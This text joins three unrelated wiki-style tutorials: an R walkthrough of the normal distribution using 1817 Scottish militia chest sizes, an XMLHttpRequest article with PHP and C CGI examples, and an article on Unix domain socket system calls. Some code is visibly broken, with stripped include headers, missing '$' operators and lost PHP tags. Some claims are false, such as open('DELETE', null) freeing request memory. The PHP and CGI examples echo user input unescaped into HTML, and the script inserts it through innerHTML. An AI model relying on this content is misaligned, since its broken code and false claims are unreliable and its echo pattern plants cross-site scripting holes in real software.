== Normal distribution ==

If a numeric data set has a central tendency, it also may have a symmetric looking histogram — a shape that resembles a bell. If a data set has an approximately bell-shaped histogram, it is said to have a normal distribution.{{cite book

| last = Weiss

| first = Neil A.

| title = Elementary Statistics, Fifth Edition

| publisher = Addison-Wesley

| year = 2002

| page = 256

| isbn = 0-201-71058-7

}}

=== Chest size of Scottish militiamen data set ===

In 1817, a Scottish army contractor measured the chest sizes of 5,732 members of a militia unit. The frequency of each size was:{{cite book

| last = Weiss

| first = Neil A.

| title = Elementary Statistics, Fifth Edition

| publisher = Addison-Wesley

| year = 2002

| page = 257

| isbn = 0-201-71058-7

}}

border="1" class="wikitable"

! Chest size (inches)

! Frequency

align="right" | 33

| align="right" | 3

align="right" | 34

| align="right" | 19

align="right" | 35

| align="right" | 81

align="right" | 36

| align="right" | 189

align="right" | 37

| align="right" | 409

align="right" | 38

| align="right" | 753

align="right" | 39

| align="right" | 1062

align="right" | 40

| align="right" | 1082

align="right" | 41

| align="right" | 935

align="right" | 42

| align="right" | 646

align="right" | 43

| align="right" | 313

align="right" | 44

| align="right" | 168

align="right" | 45

| align="right" | 50

align="right" | 46

| align="right" | 18

align="right" | 47

| align="right" | 3

align="right" | 48

| align="right" | 1

=== Create a comma-separated values file ===

R has the write.csv() function to convert a data frame into a CSV file.

R program to create chestsize.csv:

chestsize <-

c( 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48 )

frequency <-

c( 3, 19, 81, 189, 409, 753, 1062, 1082, 935, 646, 313, 168, 50, 18, 3, 1 )

dataFrame <- data.frame( chestsize, frequency )

write.csv(

dataFrame,

file="chestsize.csv",

# By default, write.csv() creates the first column as the row number.

row.names = FALSE )

=== Import a data set ===

The first step in data science is to import a data set.{{cite book

| last1 = Wickham

| first1 = Hadley

| last2 = Cetinkaya-Rundel

| first2 = Mine

| last3 = Grolemund

| first3 = Garrett

| title = R for Data Science, Second Edition

| publisher = O'Reilly

| year = 2023

| page = xiii

| isbn = 978-1-492-09740-2

}}

R program to import chestsize.csv into a data frame:

dataFrame <- read.csv( "chestsize.csv" )

print( dataFrame )

Output:

chestsize frequency

1 33 3

2 34 19

3 35 81

4 36 189

5 37 409

6 38 753

7 39 1062

8 40 1082

9 41 935

10 42 646

11 43 313

12 44 168

13 45 50

14 46 18

15 47 3

16 48 1

=== Transform a data set ===

The second step in data science is to transform the data into a format that the functions expect. The chest-size data set is summarized to frequency; however, R's normal distribution functions require a numeric double vector.

R function to convert a summarized to frequency data frame into a vector:

  1. Filename: frequencyDataFrameToVector.R

frequencyDataFrameToVector <-

function(

dataFrame,

dataColumnName,

frequencyColumnName = "frequency" )

{

dataVector <- dataFrame dataColumnName

frequencyVector <- dataFrame frequencyColumnName

vectorIndex <- 1

frequencyIndex <- 1

vector <- NA

for ( datum in dataVector )

{

frequency <- frequencyVector[ frequencyIndex ]

for ( i in 1:frequency )

{

vector[ vectorIndex ] <- datum

vectorIndex <- vectorIndex + 1

}

frequencyIndex <- frequencyIndex + 1

}

return ( vector )

}

R has the source() function to include another R source file into the current program.

R program to load and display a summary of the 5,732 member data set:

source( "frequencyDataFrameToVector.R" )

dataFrame <- read.csv( "chestsize.csv" )

chestSizeVector <-

frequencyDataFrameToVector(

dataFrame,

"chestsize" )

message( "Head:" )

head( chestSizeVector )

message( "\nTail:" )

tail( chestSizeVector )

message( "\nCount:" )

length( chestSizeVector )

message( "\nMean:" )

mean( chestSizeVector )

message( "\nStandard deviation:" )

sd( chestSizeVector )

Output:

Head:

[1] 33 33 33 34 34 34

Tail:

[1] 46 46 47 47 47 48

Count:

[1] 5732

Mean:

[1] 39.84892

Standard deviation:

[1] 2.073386

=== Visualize a data set ===

The third step in data science is to visualize the data set. If a histogram of a data set resembles a bell shape, then it is normally distributed.

R program to display a histogram of the data set:

source( "frequencyDataFrameToVector.R" )

dataFrame <- read.csv( "chestsize.csv" )

chestSizeVector <-

frequencyDataFrameToVector(

dataFrame,

"chestsize" )

hist( chestSizeVector )

Output:

File:Histogram chestsize vector.pdf

=== Standardized variable ===

Any variable (x_i) in a data set can be converted into a standardized variable (z_i). The standardized variable is also known as a z-score.{{cite book

| last = Weiss

| first = Neil A.

| title = Elementary Statistics, Fifth Edition

| publisher = Addison-Wesley

| year = 2002

| page = 133

| isbn = 0-201-71058-7

}} To calculate the z-score, subtract the mean and divide by the standard deviation.{{cite book

| last = Weiss

| first = Neil A.

| title = Elementary Statistics, Fifth Edition

| publisher = Addison-Wesley

| year = 2002

| page = 134

| isbn = 0-201-71058-7

}}

:Let x = a set of data points.

:Let \bar{x} = the mean of the data set.

:Let \sigma = the standard deviation of the data set.

:Let x_i = the i^{th} element in the set.

:Let z_i = the z-score of the i^{th} element in the set.

:z_i = \frac{x_i - \bar{x}}{\sigma}

R function to convert a measurement to a z-score:

  1. Filename: zScore.R

zScore <- function( measurement, mean, standardDeviation )

{

( measurement - mean ) / standardDeviation

}

R program to convert a chest size measurement of 38 to a z-score:

source( "zScore.R" )

print( zScore( 38, 39.84892, 2.073386 ) )

Output:

[1] -0.8917394

R program to convert a chest size measurement of 42 to a z-score:

source( "zScore.R" )

print( zScore( 42, 39.84892, 2.073386 ) )

Output:

[1] 1.037472

=== Standardized data set ===

A standardized data set is a data set in which each member of an input data set was run through the zScore function.

R function to convert a numeric vector into a z-score vector:

  1. Filename: zScoreVector.R

source( "zScore.R" )

zScoreVector <- function( vector )

{

zScoreVector = NA

for ( i in 1:length( vector ) )

{

zScoreVector[ i ] <-

zScore(

vector[ i ],

mean( vector ),

sd( vector ) )

}

return( zScoreVector )

}

=== Standardized chest size data set ===

R program to standardize the chest size data set:

source( "frequencyDataFrameToVector.R" )

source( "zScoreVector.R" )

dataFrame <- read.csv( "chestsize.csv" )

chestSizeVector <-

frequencyDataFrameToVector(

dataFrame,

dataColumnName = "chestsize" )

zScoreVector <-

zScoreVector(

chestSizeVector )

message( "Head:" )

head( zScoreVector )

message( "\nTail:" )

tail( zScoreVector )

message( "\nCount:" )

length( zScoreVector )

message( "\nMean:" )

round( mean( zScoreVector ) )

message( "\nStandard deviation:" )

sd( zScoreVector )

hist( zScoreVector )

Output:

Head:

[1] -3.303253 -3.303253 -3.303253 -2.820950 -2.820950 -2.820950

Tail:

[1] 2.966684 2.966684 3.448987 3.448987 3.448987 3.931290

Count:

[1] 5732

Mean:

[1] 0

Standard deviation:

[1] 1

File:Histogram zscore.pdf

=== Standard normal curve ===

File:Gaussian distribution 2.jpg

A histogram of a normally distributed data set that is converted to its standardized data set also resembles a bell-shaped curve. The curve is called the standard normal curve or the z-curve. The four basic properties of the z-curve are:{{cite book

| last = Weiss

| first = Neil A.

| title = Elementary Statistics, Fifth Edition

| publisher = Addison-Wesley

| year = 2002

| page = 266

| isbn = 0-201-71058-7

}}

  1. The total area under the curve is 1.
  2. The curve extends indefinitely to the left and right. It never touches the horizontal axis.
  3. The curve is symmetric and centered at 0.
  4. Almost all of the area under the curve lies between -3 and 3.

=== Area under the standard normal curve ===

The probability that a future measurement will be a value between a designated range is equal to the area under the standard normal curve of the designated range's two z-scores.{{cite book

| last = Weiss

| first = Neil A.

| title = Elementary Statistics, Fifth Edition

| publisher = Addison-Wesley

| year = 2002

| page = 265

| isbn = 0-201-71058-7

}}

For example, suppose the Scottish militia's quartermaster wanted to stock up on uniforms. What is the probability that the next recruit will need a size between 38 and 42?

R program:

library( tigerstats )

source( "frequencyDataFrameToVector.R" )

source( "zScore.R" )

dataFrame <- read.csv( "chestsize.csv" )

chestSizeVector <-

frequencyDataFrameToVector(

dataFrame,

dataColumnName = "chestsize" )

zScore38 <-

zScore( 38, mean( chestSizeVector ), sd( chestSizeVector ) )

zScore42 <-

zScore( 42, mean( chestSizeVector ), sd( chestSizeVector ) )

areaLeft38 <- tigerstats::pnormGC( zScore38 )

areaLeft42 <- tigerstats::pnormGC( zScore42 )

areaBetween <- areaLeft42 - areaLeft38

message( "Probability:" )

print( areaBetween )

Output:

Probability:

[1] 0.6639757

The pnormGC() function can compute the probability between a range without first calculating the z-score.

R program:

library( tigerstats )

source( "frequencyDataFrameToVector.R" )

dataFrame <- read.csv( "chestsize.csv" )

chestSizeVector <-

frequencyDataFrameToVector(

dataFrame,

dataColumnName = "chestsize" )

areaBetween <-

tigerstats::pnormGC(

c( 38, 42 ),

mean = mean( chestSizeVector ),

sd = sd( chestSizeVector ),

region = "between",

graph = TRUE )

message( "Probability:" )

print( areaBetween )

Output:

Probability:

[1] 0.6639757

File:Normal pnormGC.pdf

XMLHttpRequest

XMLHttpRequest is a JavaScript class containing methods to asynchronously transmit HTTP requests from a web browser to a web server.{{cite book

| last = Mahemoff

| first = Michael

| title = Ajax Design Patterns

| publisher = O'Reilly

| year = 2006

| page = 92

| isbn = 978-0-596-10180-0

| quote = Javascript lacks a portable mechanism for general network communication[.] ... But thanks to the XMLHttpRequest object, ... Javascript code can make HTTP calls back to its originating server[.]

}} The methods allow a browser-based application to make a fine-grained server call and store the result in the XMLHttpRequest responseText attribute.{{cite book

| last = Mahemoff

| first = Michael

| title = Ajax Design Patterns

| publisher = O'Reilly

| year = 2006

| page = 92

| isbn = 978-0-596-10180-0

}} The XMLHttpRequest class is a component of Ajax programming. Without Ajax, the "Submit" button will send to the server an entire HTML form. The server will respond by returning an entire HTML page to the browser.

=Constructor=

Generating an asynchronous request to the web server requires first to instantiate (allocate the memory of) the XMLHttpRequest object. The allocated memory is assigned to a variable. The programming statement in JavaScript to instantiate a new object is new.{{cite book

| last = Flanagan

| first = David

| title = JavaScript, The Definitive Guide

| publisher = O'Reilly and Associates

| year = 1998

| page = 82

| isbn = 1-56592-392-8}} The new statement is followed by the constructor function of the object. The custom for object-oriented language developers is to invoke the constructor function using same name as the class name.{{cite book

| last1 = Welling

| first1 = Luke

| last2 = Thomson

| first2 = Laura

| title = PHP and MySQL Web Development

| publisher = Sams Publishing

| year = 2005

| page = 162

| isbn = 0-672-32672-8

}} In this case, the class name is XMLHttpRequest. To instantiate a new XMLHttpRequest and assign it to the variable named request:

var request = new XMLHttpRequest();{{cite web

| title=XMLHttpRequest Standard; The constructor

| url=https://xhr.spec.whatwg.org/#constructors

| access-date=2023-04-10

}}

=The ''open'' method=

The open method prepares the XMLHttpRequest.{{cite book

| last = Mahemoff

| first = Michael

| title = Ajax Design Patterns

| publisher = O'Reilly

| year = 2006

| page = 100

| isbn = 978-0-596-10180-0

}} It can accept up to five parameters, but requires only the first two.

var request = new XMLHttpRequest();

request.open( RequestMethod, SubmitURL, AsynchronousBoolean, UserName, Password );

  • RequestMethod: The HTTP request method may be GET for smaller quantities of data. Among the other request methods available, POST will handle substantial quantities of data.{{cite book

| last = Mahemoff

| first = Michael

| title = Ajax Design Patterns

| publisher = O'Reilly

| year = 2006

| page = 96

| quote = POST, for example, is suited to calls that affect server state or upload substantial quantities of data.

| isbn = 978-0-596-10180-0

}} After the return string is received, then send the DELETE request method to .open() to free the XMLHttpRequest memory.{{cite web

| title=HTTP Documentation

| date=June 2022

| url=https://httpwg.org/specs/rfc9110.html#method.overview

| access-date=2023-04-12

}} If DELETE is sent, then the SubmitURL parameter may be null.

: * request.open( "DELETE", null );

  • SubmitURL: The SubmitURL is a URL containing the execution filename and any parameters that get submitted to the web server. If the URL contains the host name, it must be the web server that sent the HTML document. Ajax supports the same-origin policy.{{cite book

| last = Mahemoff

| first = Michael

| title = Ajax Design Patterns

| publisher = O'Reilly

| year = 2006

| page = 98

| isbn = 978-0-596-10180-0

}}

  • AsynchronousBoolean: If supplied, it should be set to true. If set to false, then the browser will wait until the return string is received. Programmers are discouraged to set AsynchronousBoolean to false, and browsers may experience an exception error.{{cite web

| title=XMLHttpRequest Standard; The open method

| url=https://xhr.spec.whatwg.org/#the-open()-method

| access-date=2023-04-12

}}

  • UserName: If supplied, it will help authenticate the user.
  • Password: If supplied, it will help authenticate the user.

=The ''setRequestHeader'' method=

If the request method of POST is invoked, then the additional step of sending the media type of Content-Type: application/x-www-form-urlencoded is required.{{cite book

| last = Mahemoff

| first = Michael

| title = Ajax Design Patterns

| publisher = O'Reilly

| year = 2006

| page = 97

| isbn = 978-0-596-10180-0

}} The setRequestHeader method allows the program to send this or other HTTP headers to the web server. Its usage is setRequestHeader( HeaderField, HeaderValue ). To enable the POST request method:

: * request.setRequestHeader( "Content-Type", "application/x-www-form-urlencoded" );

=The ''send'' method=

If the request method of POST is invoked, then the web server expects the form data to be read from the standard input stream.{{cite book

| last = Flanagan

| first = David

| title = JavaScript, The Definitive Guide

| publisher = O'Reilly and Associates

| year = 1998

| page = 511

| isbn = 1-56592-392-8}} To send the form data to the web server, execute request.send( FormData ), where FormData is a text string. If the request method of GET is invoked, then the web server expects only the default headers.{{cite book

| last = Mahemoff

| first = Michael

| title = Ajax Design Patterns

| publisher = O'Reilly

| year = 2006

| page = 26

| isbn = 978-0-596-10180-0

}} To send the default headers, execute request.send( null ).{{efn|The null placeholder is currently in retirement but recommended.}}

=The ''onreadystatechange'' event listener=

onreadystatechange is a callback method that is periodically executed throughout the Ajax lifecycle.{{cite book

| last = Mahemoff

| first = Michael

| title = Ajax Design Patterns

| publisher = O'Reilly

| year = 2006

| page = 25

| isbn = 978-0-596-10180-0

}} To set a callback method named listenMethod(), the syntax is request.onreadystatechange = listenMethod.{{efn|For safety, this assignment should follow the execution of request.open().}} For convenience, the syntax allows for an anonymous method to be defined. To define an anonymous callback method:

var request = new XMLHttpRequest();

request.onreadystatechange = function()

{

// code omitted

}

The XMLHttpRequest lifecycle progresses through several stages – from 0 to 4. Stage 0 is before the open() method is invoked, and stage 4 is when the text string has arrived.{{cite book

| last = Mahemoff

| first = Michael

| title = Ajax Design Patterns

| publisher = O'Reilly

| year = 2006

| page = 26

| isbn = 978-0-596-10180-0

}} To monitor the lifecycle, XMLHttpRequest has available the readyState attribute. Stages 1-3 are ambiguous and interpretations vary across browsers. Nonetheless, one interpretation is:

  • Stage 0: Uninitialized
  • Stage 1: Loading
  • Stage 2: Loaded
  • Stage 3: Interactive
  • Stage 4: Completed

When readyState reaches 4, then the text string has arrived and is set in the responseText attribute.

var request = new XMLHttpRequest();

request.onreadystatechange = function()

{

if ( request.readyState == 4 )

{

// request.responseText is set

}

}

=Linux examples=

Upon request, the browser will execute a JavaScript function to transmit a request for the web server to execute a computer program. The computer program may be the PHP interpreter, another interpreter, or a compiled executable. In any case, the JavaScript function expects a text string to be transmitted back and stored in the responseText attribute.{{cite book

| last = Mahemoff

| first = Michael

| title = Ajax Design Patterns

| publisher = O'Reilly

| year = 2006

| page = 26

| isbn = 978-0-596-10180-0

}}

To create an example JavaScript function:

  • cd /var/www/html
  • Edit a file named ajax_submit.js:

function ajax_submit( destination_division, submit_url, person_name )

{

var request = new XMLHttpRequest();

var completed_state = 4;

submit_url = submit_url + "?person_name=" + person_name;

request.open( "GET", submit_url, true );

request.send( null );

request.onreadystatechange = function()

{

if ( request.readyState == completed_state )

{

document.

getElementById( destination_division ).

innerHTML =

request.responseText;

request.open( "DELETE", null );

}

}

}

=PHP example=

PHP is a scripting language designed specifically to interface with HTML.{{cite book

| last1 = Welling

| first1 = Luke

| last2 = Thomson

| first2 = Laura

| title = PHP and MySQL Web Development

| publisher = Sams Publishing

| year = 2005

| page = 2

| isbn = 0-672-32672-8

| quote = PHP is a server-side scripting language designed specifically for the Web.

}} Because the PHP engine is an interpreter – interpreting program statements as they are read – there are programming limitations{{efn|Whereas PHP is a rich language and interfaces well with certain databases, it supports only a subset of container types and lacks declarative language constructs.}} and performance costs.{{efn|An interpreter executes each programming statement; however, a compiled program has each machine instruction ready for the CPU.}} Nonetheless, its simplicity may place the XMLHttpRequest set of files in the same working directory – probably /var/www/html.

==PHP server component==

The server component of a PHP XMLHttpRequest is a file located on the server that does not get transmitted to the browser. Instead, the PHP interpreter will open this file and read in its PHP instructions. The XMLHttpRequest protocol requires an instruction to output a text string.

  • cd /var/www/html
  • Edit a file named ajax_server.php:

$person_name = $_GET[ 'person_name' ];

echo "

Hello $person_name";

?>

==PHP browser component==

The browser component of a PHP XMLHttpRequest is a file that gets transmitted to the browser. The browser will open this file and read in its HTML instructions.

  • cd /var/www/html
  • Edit a file named ajax_php.html:

Hello World

What is your name?

onclick="ajax_submit(

'destination_division',

'ajax_server.php',

document.getElementById( 'person_name' ).value )">

Submit

  1. Point your browser to http://localhost/ajax_php.html
  2. Type in your name.
  3. Press Submit

=CGI example=

The Common Gateway Interface (CGI) process allows a browser to request the web server to execute a compiled computer program.{{efn|The web server may be configured to execute interpreted programs, also.{{cite web

| title=Apache Tutorial

| url=https://httpd.apache.org/docs/2.4/howto/cgi.html

| access-date=2023-04-10

}}}}

==CGI server component==

The server component of a CGI XMLHttpRequest is an executable file located on the server. The operating system will open this file and read in its machine instructions. The XMLHttpRequest protocol requires an instruction to output a text string.

Compiled programs have two files: the source code and a corresponding executable.

  • cd /usr/lib/cgi-bin
  • Edit a file named ajax_server.c:

  1. include
  2. include
  3. include

void main( void )

{

char *query_string;

char *person_name;

query_string = getenv( "QUERY_STRING" );

/* Skip "person_name=" */

person_name = query_string + strlen( "person_name=" );

/* CGI requires the first line to output: */

printf( "Content-type: text/html\n" );

/* CGI requires the second line to output: */

printf( "\n" );

printf( "

Hello %s\n", person_name );

}

  • Compile the source code to create the executable:

cc ajax_server.c -o ajax_server

==CGI browser component==

The CGI browser component is the same as the PHP browser component, except for a slight change in the submit_url. The syntax to tell the web server to execute an executable is /cgi-bin/ followed by the filename. For security, the executable must reside in a chroot jail. In this case, the jail is the directory /usr/lib/cgi-bin/.{{efn|The web server may be configured to add other executable directories.}}

  • cd /var/www/html
  • Edit a file named ajax_cgi.html:

Hello World

What is your name?

onclick="ajax_submit(

'destination_division',

'/cgi-bin/ajax_server',

document.getElementById( 'person_name' ).value )">

Submit

  1. Point your browser to http://localhost/ajax_cgi.html
  2. Type in your name.
  3. Press Submit

Unix domain socket

In client-server computing, a Unix domain socket is a Berkeley socket that allows data to be exchanged between two processes executing on the same Unix or Unix-like host computer.{{cite book

|title=The Linux Programming Interface

|last=Kerrisk

|first=Michael

|publisher=No Starch Press

|year=2010

|quote=Sockets are a method of IPC that allow data to be exchanged between applications, either on the same host (computer) or on different hosts connected by a network.

|isbn=978-1-59327-220-3

|page=1149}} This is similar to an Internet domain socket that allows data to be exchanged between two processes executing on different host computers.

Regardless of the range of communication (same host or different host),{{cite book

|title=The Linux Programming Interface

|last=Kerrisk

|first=Michael

|publisher=No Starch Press

|year=2010

|isbn=978-1-59327-220-3

|page=1150}} Unix computer programs that perform socket communication are similar. The only range of communication difference is the method to convert a name to the address parameter needed to bind the socket's connection. For a Unix domain socket, the name is a /path/filename. For an Internet domain socket, the name is an IP address:Port number. In either case, the name is called an address.{{cite book

|title=The Linux Programming Interface

|last=Kerrisk

|first=Michael

|publisher=No Starch Press

|year=2010

|isbn=978-1-59327-220-3

|quote=The server binds its socket to a well-known address (name) so that clients can locate it.

|page=1150}}

Two processes may communicate with each other if each obtains a socket. The server process binds its socket to an address, opens a listen channel, and then continuously loops. Inside the loop, the server process is put to sleep while waiting to accept a client connection.{{cite book

|title=Unix Network Programming

|last1=Stevens

|first1=Richard W.

|last2=Fenner

|first2=Bill

|last3=Rudoff

|first3=Andrew M.

|publisher=Pearson Education

|year=2004

|edition=3rd

|isbn=81-297-0710-1

|quote=Normally, the server process is put to sleep in the call to accept, waiting for a client connection to arrive and be accepted.

|page=14}} Upon accepting a client connection, the server then executes a read system call that will block wait. The client connects to the server's socket via the server's address. The client process then writes a message for the server process to read. The application's algorithm may entail multiple read/write interactions. Upon completion of the algorithm, the client executes exit(){{cite book

|title=The Linux Programming Interface

|last=Kerrisk

|first=Michael

|publisher=No Starch Press

|year=2010

|isbn=978-1-59327-220-3

|page=1169}} and the server executes close().{{cite book

|title=The Linux Programming Interface

|last=Kerrisk

|first=Michael

|publisher=No Starch Press

|year=2010

|isbn=978-1-59327-220-3

|page=1159}}

For a Unix domain socket, the socket's address is a /path/filename identifier. The server will create /path/filename on the filesystem to act as a lock file semaphore. No I/O occurs on this file when the client and server send messages to each other.{{cite book

|title=The Linux Programming Interface

|last=Kerrisk

|first=Michael

|publisher=No Starch Press

|year=2010

|isbn=978-1-59327-220-3

|page=1166}}

=History=

Sockets first appeared in Berkeley Software Distribution 4.2 (1983).{{cite book

|title=The Linux Programming Interface

|last=Kerrisk

|first=Michael

|publisher=No Starch Press

|year=2010

|isbn=978-1-59327-220-3

|page=1149}} It became a POSIX standard in 2000. The application programming interface has been ported to virtually every Unix implementation and most other operating systems.

=Socket instantiation=

Both the server and the client must instantiate a socket object by executing the socket() system call. Its usage is{{cite book

|title=The Linux Programming Interface

|last=Kerrisk

|first=Michael

|publisher=No Starch Press

|year=2010

|isbn=978-1-59327-220-3

|page=1153}}

int socket( int domain, int type, int protocol );

The domain parameter should be one of the following common ranges of communication:{{cite book

|title=The Linux Programming Interface

|last=Kerrisk

|first=Michael

|publisher=No Starch Press

|year=2010

|isbn=978-1-59327-220-3

|page=1151}}

  1. Within the same host by using the constant AF_UNIX{{efn|Alternatively, PF_UNIX or AF_LOCAL may be used.{{cite web

| url = http://man7.org/linux/man-pages/man7/unix.7.html

| date = 30 April 2018

| title = Linux Programmer's Manual (unix - sockets for local interprocess communication)

| access-date = 22 February 2019

| df = dmy-all}} The AF stands for "Address Family", and the PF stands for "Protocol Family".}}

  1. Between two hosts via the IPv4 protocol by using the constant AF_INET
  2. Between two hosts via the IPv6 protocol by using the constant AF_INET6

The Unix domain socket label is used when the domain parameter's value is AF_UNIX. The Internet domain socket label is used when the domain parameter's value is either AF_INET or AF_INET6.{{cite book

|title=The Linux Programming Interface

|last=Kerrisk

|first=Michael

|publisher=No Starch Press

|year=2010

|isbn=978-1-59327-220-3

|page=1197}}

The type parameter should be one of following common socket types:

  1. SOCK_STREAM will create a stream socket. A stream socket provides a reliable, bidirectional, and connection-oriented communication channel between two processes. For internet domain sockets, data is carried using the Transmission Control Protocol (TCP).
  2. SOCK_DGRAM will create a datagram socket.{{efn|A datagram socket should not be confused with a datagram packet used in the network layer.{{cite book

|title=The Linux Programming Interface

|last=Kerrisk

|first=Michael

|publisher=No Starch Press

|year=2010

|isbn=978-1-59327-220-3

|page=1183}}}} A datagram socket is connectionless and preserves message boundaries. For internet domain sockets, data is carried using the User Datagram Protocol (UDP).{{cite book

|title=The Linux Programming Interface

|last=Kerrisk

|first=Michael

|publisher=No Starch Press

|year=2010

|isbn=978-1-59327-220-3

|page=1152}}

  1. SOCK_SEQPACKET will create a sequenced-packet socket. Similar to a stream socket, it is connection-oriented, but message boundaries are preserved, just like datagram sockets. For internet domain sockets, the Stream Control Transmission Protocol is used.{{cite book

|title=The Linux Programming Interface

|last=Kerrisk

|first=Michael

|publisher=No Starch Press

|year=2010

|isbn=978-1-59327-220-3

|page=1285}}

  1. SOCK_RAW will create a raw Internet Protocol (IP) datagram socket. A raw socket bypasses the transport layer and allows applications to interface directly with the network layer.{{cite book

|title=The Linux Programming Interface

|last=Kerrisk

|first=Michael

|publisher=No Starch Press

|year=2010

|isbn=978-1-59327-220-3

|page=1184}} This option is only available for internet domain sockets.

The protocol parameter should be set to zero, except for raw sockets, where the protocol parameter should be set to IPPROTO_RAW.{{cite book

|title=The Linux Programming Interface

|last=Kerrisk

|first=Michael

|publisher=No Starch Press

|year=2010

|isbn=978-1-59327-220-3

|page=1153}}

==socket() return value==

socket_fd = socket( int domain, int type, int protocol );

Like the regular-file open() system call, the socket() system call returns a file descriptor.{{efn|In UNIX, Everything is a file.}} The return value's suffix _fd stands for file descriptor.

=Server bind to /path/filename=

After instantiating a new socket, the server binds the socket to an address. For a Unix domain socket, the address is a /path/filename.

Because the socket address may be either a /path/filename or an IP_address:Port_number, the socket application programming interface requires the address to first be set into a structure. For a Unix domain socket, the structure is{{cite book

|title=The Linux Programming Interface

|last=Kerrisk

|first=Michael

|publisher=No Starch Press

|year=2010

|isbn=978-1-59327-220-3

|page=1165}}

struct sockaddr_un {

sa_family_t sun_family; /* AF_UNIX */

char sun_path[ 92 ];

}

The _un suffix stands for unix. For an Internet domain socket, the suffix will be either _in or _in6. The sun_ prefix stands for socket unix.

Computer program to create and bind a stream Unix domain socket:

  1. include
  2. include
  3. include
  4. include
  5. include
  6. include
  7. include
  8. include

/* Should be 91 characters or less. Some Unix-like are slightly more. */

/* Use /tmp directory for demonstration only. */

char *socket_address = "/tmp/mysocket.sock";

void main( void )

{

int server_socket_fd;

struct sockaddr_un sockaddr_un = {0};

int return_value;

server_socket_fd = socket( AF_UNIX, SOCK_STREAM, 0 );

if ( server_socket_fd == -1 ) assert( 0 );

/* Remove (maybe) a prior run. */

remove( socket_address );

/* Construct the bind address structure. */

sockaddr_un.sun_family = AF_UNIX;

strcpy( sockaddr_un.sun_path, socket_address );

return_value =

bind(

server_socket_fd,

(struct sockaddr *) &sockaddr_un,

sizeof( struct sockaddr_un ) );

/* If socket_address exists on the filesystem, then bind will fail. */

if ( return_value == -1 ) assert( 0 );

/* Listen and accept code omitted. */

}

The second parameter for bind() is a pointer to struct sockaddr. However, the parameter passed to the function is the address of a struct sockaddr_un. struct sockaddr is a generic structure that is not used. It is defined in the formal parameter declaration for bind(). Because each range of communication has its own actual parameter, this generic structure was created as a cast placeholder.{{cite book

|title=The Linux Programming Interface

|last=Kerrisk

|first=Michael

|publisher=No Starch Press

|year=2010

|isbn=978-1-59327-220-3

|page=1154}}

=Server listen for a connection=

After binding to an address, the server opens a listen channel to a port by executing listen(). Its usage is{{cite web

|title=Linux manual page for listen()

|url=https://man7.org/linux/man-pages/man2/listen.2.html}}

int listen( int server_socket_fd, int backlog );

Snippet to listen:

if ( listen( server_socket_fd, 4096 ) == -1 ) assert( 0 );

For a Unix domain socket, listen() most likely will succeed and return 0. For an Internet domain socket, if the port is in use, listen() returns -1.

The backlog parameter sets the queue size for pending connections.{{cite book

|title=The Linux Programming Interface

|last=Kerrisk

|first=Michael

|publisher=No Starch Press

|year=2010

|isbn=978-1-59327-220-3

|page=1157}} The server may be busy when a client executes a connect() request. Connection requests up to this limit will succeed. If the backlog value passed in exceeds the default maximum, then the maximum value is used.

=Server accept a connection=

After opening a listen channel, the server enters an infinite loop. Inside the loop is a system call to accept(), which puts itself to sleep. The accept() system call will return a file descriptor when a client process executes connect().{{cite web

|title=Linux manual page for accept()

|url=https://man7.org/linux/man-pages/man2/accept.2.html}}

Snippet to accept a connection:

int accept_socket_fd;

while ( 1 )

{

accept_socket_fd = accept( server_socket_fd, NULL, NULL );

if ( accept_socket_fd == -1 ) assert( 0 );

if ( accept_socket_fd > 0 ) /* client is connected */

}

=Server I/O on a socket=

When accept() returns a positive integer, the server engages in an algorithmic dialog with the client.

Stream socket input/output may execute the regular-file system calls of read() and write(). However, more control is available if a stream socket executes the socket-specific system calls of send() and recv(). Alternatively, datagram socket input/output should execute the socket-specific system calls of sendto() and recvfrom().{{cite book

|title=The Linux Programming Interface

|last=Kerrisk

|first=Michael

|publisher=No Starch Press

|year=2010

|isbn=978-1-59327-220-3

|page=1160}}

For a basic stream socket, the server receives data with read( accept_socket_fd ) and sends data with write( accept_socket_fd ).

Snippet to illustrate I/O on a basic stream socket:

int accept_socket_fd;

while ( 1 )

{

accept_socket_fd = accept( server_socket_fd, NULL, NULL );

if ( accept_socket_fd == -1 ) assert( 0 );

if ( accept_socket_fd > 0 )

{

server_algorithmic_dialog( accept_socket_fd );

}

}

  1. define BUFFER_SIZE 1024

void server_algorithmic_dialog(

int accept_socket_fd )

{

char input_buffer[ BUFFER_SIZE ];

char output_buffer[ BUFFER_SIZE ];

read( accept_socket_fd, input_buffer, BUFFER_SIZE );

if ( strcasecmp( input_buffer, "hola" ) == 0 )

strcpy( output_buffer, "Hola Mundo" );

else

if ( strcasecmp( input_buffer, "ciao" ) == 0 )

strcpy( output_buffer, "Ciao Mondo" );

else

strcpy( output_buffer, "Hello World" );

write( accept_socket_fd, output_buffer, strlen( output_buffer ) + 1 );

}

=Server close a connection=

The algorithmic dialog ends when either the algorithm concludes or read( accept_socket_fd ) returns < 1. To close the connection, execute the close() system call:

Snippet to close a connection:

int accept_socket_fd;

while ( 1 )

{

accept_socket_fd = accept( server_socket_fd, NULL, NULL );

if ( accept_socket_fd == -1 ) assert( 0 );

if ( accept_socket_fd > 0 )

{

server_algorithmic_dialog( accept_socket_fd );

close( accept_socket_fd );

}

}

Snippet to illustrate the end of a dialog:

  1. define BUFFER_SIZE 1024

void server_algorithmic_dialog(

int accept_socket_fd )

{

char buffer[ BUFFER_SIZE ];

int read_count;

/* Omit algorithmic dialog */

read_count = read( accept_socket_fd, buffer, BUFFER_SIZE );

if ( read_count < 1 ) return;

/* Omit algorithmic dialog */

}

=Client instantiate and connect to /path/filename=

Computer program for the client to instantiate and connect a socket:

  1. include
  2. include
  3. include
  4. include
  5. include
  6. include
  7. include
  8. include

/* Must match the server's socket_address. */

char *socket_address = "/tmp/mysocket.sock";

void main( void )

{

int client_socket_fd;

struct sockaddr_un sockaddr_un = {0};

int return_value;

client_socket_fd = socket( AF_UNIX, SOCK_STREAM, 0 );

if ( client_socket_fd == -1 ) assert( 0 );

/* Construct the client address structure. */

sockaddr_un.sun_family = AF_UNIX;

strcpy( sockaddr_un.sun_path, socket_address );

return_value =

connect(

client_socket_fd,

(struct sockaddr *) &sockaddr_un,

sizeof( struct sockaddr_un ) );

/* If socket_address doesn't exist on the filesystem, */

/* or if the server's connection-request queue is full, */

/* then connect() will fail. */

if ( return_value == -1 ) assert( 0 );

/* close( client_socket_fd ); <-- optional */

exit( EXIT_SUCCESS );

}

=Client I/O on a socket=

